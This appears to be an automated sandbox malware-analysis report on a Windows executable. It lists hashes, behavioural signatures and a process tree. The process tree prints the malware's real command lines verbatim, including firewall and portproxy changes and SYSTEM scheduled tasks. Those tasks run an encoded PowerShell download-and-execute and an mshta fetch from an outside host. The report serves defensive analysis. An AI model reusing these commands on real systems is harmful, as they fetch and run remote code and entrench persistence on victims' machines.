Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
15-05-2021 14:55
Static task
static1
Behavioral task
behavioral1
Sample
d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe
Resource
win10v20210408
General
-
Target
d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe
-
Size
6.6MB
-
MD5
25369980e676f0d0ec7c800e81542eb7
-
SHA1
d7872bf7ea33888f20d501990b3000745c9201da
-
SHA256
d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6
-
SHA512
07ea34b613f61da1868696e3b070825e6176403f5f33b21cc29f37d7fa28e0509c635048cf7c826bc8ee0815f6b22d1a391b664990c40b867813095796b3f06b
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 20 IoCs
pid Process 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created \??\c:\windows\jxXp.exe cmd.exe File opened for modification \??\c:\windows\jxXp.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2244 schtasks.exe 1364 schtasks.exe 2116 schtasks.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 1884 netstat.exe 1064 ipconfig.exe 1124 ipconfig.exe -
Modifies data under HKEY_USERS 33 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000e02a4b17ef49d701 WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software WScript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000060b05417ef49d701 WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1156 WMIC.exe Token: SeSecurityPrivilege 1156 WMIC.exe Token: SeTakeOwnershipPrivilege 1156 WMIC.exe Token: SeLoadDriverPrivilege 1156 WMIC.exe Token: SeSystemProfilePrivilege 1156 WMIC.exe Token: SeSystemtimePrivilege 1156 WMIC.exe Token: SeProfSingleProcessPrivilege 1156 WMIC.exe Token: SeIncBasePriorityPrivilege 1156 WMIC.exe Token: SeCreatePagefilePrivilege 1156 WMIC.exe Token: SeBackupPrivilege 1156 WMIC.exe Token: SeRestorePrivilege 1156 WMIC.exe Token: SeShutdownPrivilege 1156 WMIC.exe Token: SeDebugPrivilege 1156 WMIC.exe Token: SeSystemEnvironmentPrivilege 1156 WMIC.exe Token: SeRemoteShutdownPrivilege 1156 WMIC.exe Token: SeUndockPrivilege 1156 WMIC.exe Token: SeManageVolumePrivilege 1156 WMIC.exe Token: 33 1156 WMIC.exe Token: 34 1156 WMIC.exe Token: 35 1156 WMIC.exe Token: SeIncreaseQuotaPrivilege 1156 WMIC.exe Token: SeSecurityPrivilege 1156 WMIC.exe Token: SeTakeOwnershipPrivilege 1156 WMIC.exe Token: SeLoadDriverPrivilege 1156 WMIC.exe Token: SeSystemProfilePrivilege 1156 WMIC.exe Token: SeSystemtimePrivilege 1156 WMIC.exe Token: SeProfSingleProcessPrivilege 1156 WMIC.exe Token: SeIncBasePriorityPrivilege 1156 WMIC.exe Token: SeCreatePagefilePrivilege 1156 WMIC.exe Token: SeBackupPrivilege 1156 WMIC.exe Token: SeRestorePrivilege 1156 WMIC.exe Token: SeShutdownPrivilege 1156 WMIC.exe Token: SeDebugPrivilege 1156 WMIC.exe Token: SeSystemEnvironmentPrivilege 1156 WMIC.exe Token: SeRemoteShutdownPrivilege 1156 WMIC.exe Token: SeUndockPrivilege 1156 WMIC.exe Token: SeManageVolumePrivilege 1156 WMIC.exe Token: 33 1156 WMIC.exe Token: 34 1156 WMIC.exe Token: 35 1156 WMIC.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 1884 netstat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2020 wrote to memory of 1636 2020 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 27 PID 2020 wrote to memory of 1636 2020 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 27 PID 2020 wrote to memory of 1636 2020 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 27 PID 2020 wrote to memory of 1636 2020 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 27 PID 1636 wrote to memory of 1684 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 31 PID 1636 wrote to memory of 1684 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 31 PID 1636 wrote to memory of 1684 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 31 PID 1636 wrote to memory of 1684 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 31 PID 1684 wrote to memory of 1156 1684 cmd.exe 32 PID 1684 wrote to memory of 1156 1684 cmd.exe 32 PID 1684 wrote to memory of 1156 1684 cmd.exe 32 PID 1684 wrote to memory of 1156 1684 cmd.exe 32 PID 1636 wrote to memory of 1520 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 34 PID 1636 wrote to memory of 1520 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 34 PID 1636 wrote to memory of 1520 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 34 PID 1636 wrote to memory of 1520 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 34 PID 1520 wrote to memory of 1780 1520 cmd.exe 35 PID 1520 wrote to memory of 1780 1520 cmd.exe 35 PID 1520 wrote to memory of 1780 1520 cmd.exe 35 PID 1520 wrote to memory of 1780 1520 cmd.exe 35 PID 1780 wrote to memory of 1340 1780 net.exe 36 PID 1780 wrote to memory of 1340 1780 net.exe 36 PID 1780 wrote to memory of 1340 1780 net.exe 36 PID 1780 wrote to memory of 1340 1780 net.exe 36 PID 1636 wrote to memory of 2032 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 37 PID 1636 wrote to memory of 2032 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 37 PID 1636 wrote to memory of 2032 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 37 PID 1636 wrote to memory of 2032 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 37 PID 2032 wrote to memory of 1796 2032 cmd.exe 38 PID 2032 wrote to memory of 1796 2032 cmd.exe 38 PID 2032 wrote to memory of 1796 2032 cmd.exe 38 PID 2032 wrote to memory of 1796 2032 cmd.exe 38 PID 1796 wrote to memory of 1504 1796 net.exe 39 PID 1796 wrote to memory of 1504 1796 net.exe 39 PID 1796 wrote to memory of 1504 1796 net.exe 39 PID 1796 wrote to memory of 1504 1796 net.exe 39 PID 1636 wrote to memory of 1984 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 40 PID 1636 wrote to memory of 1984 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 40 PID 1636 wrote to memory of 1984 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 40 PID 1636 wrote to memory of 1984 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 40 PID 1636 wrote to memory of 1364 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 41 PID 1636 wrote to memory of 1364 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 41 PID 1636 wrote to memory of 1364 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 41 PID 1636 wrote to memory of 1364 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 41 PID 1364 wrote to memory of 1064 1364 cmd.exe 42 PID 1364 wrote to memory of 1064 1364 cmd.exe 42 PID 1364 wrote to memory of 1064 1364 cmd.exe 42 PID 1364 wrote to memory of 1064 1364 cmd.exe 42 PID 1636 wrote to memory of 1124 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 43 PID 1636 wrote to memory of 1124 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 43 PID 1636 wrote to memory of 1124 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 43 PID 1636 wrote to memory of 1124 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 43 PID 1636 wrote to memory of 1884 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 44 PID 1636 wrote to memory of 1884 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 44 PID 1636 wrote to memory of 1884 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 44 PID 1636 wrote to memory of 1884 1636 d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe 44 PID 1780 wrote to memory of 3068 1780 SqgbroYc.exe 46 PID 1780 wrote to memory of 3068 1780 SqgbroYc.exe 46 PID 1780 wrote to memory of 3068 1780 SqgbroYc.exe 46 PID 1780 wrote to memory of 3068 1780 SqgbroYc.exe 46 PID 3068 wrote to memory of 1732 3068 cmd.exe 48 PID 3068 wrote to memory of 1732 3068 cmd.exe 48 PID 3068 wrote to memory of 1732 3068 cmd.exe 48 PID 3068 wrote to memory of 1732 3068 cmd.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe"C:\Users\Admin\AppData\Local\Temp\d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe"C:\Users\Admin\AppData\Local\Temp\d5d659c147e9ef6a75b7312c9d6b2d5c86145d66c25796ecdc0787aa48d32cb6.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\cmd.execmd /c wmic ntdomain get domainname3⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ntdomain get domainname4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\net.exenet localgroup administrators4⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:1340
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net group "domain admins" /domain3⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\net.exenet group "domain admins" /domain4⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" /domain5⤵PID:1504
-
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all3⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:1064
-
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:1124
-
-
C:\Windows\SysWOW64\netstat.exenetstat -na3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
-
C:\Windows\SqgbroYc.exeC:\Windows\SqgbroYc.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
PID:1732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HDgi >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\jxXp.exe&move /y c:\windows\temp\dig.exe c:\windows\uhuhlE.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn jxXp /tr "C:\Windows\jxXp.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\ThWynjfS" /tr "c:\windows\uhuhlE.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pMRBKYMNO"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\uhuhlE.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\jxXp.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
PID:2980 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
PID:1328
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
PID:2104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
PID:2244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn jxXp /tr "C:\Windows\jxXp.exe" /F5⤵
- Creates scheduled task(s)
PID:1364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\ThWynjfS" /tr "c:\windows\uhuhlE.exe" /F5⤵
- Creates scheduled task(s)
PID:2116
-
-
-
-
-
C:\Windows\eGFOxOwp.exeC:\Windows\eGFOxOwp.exe1⤵PID:3028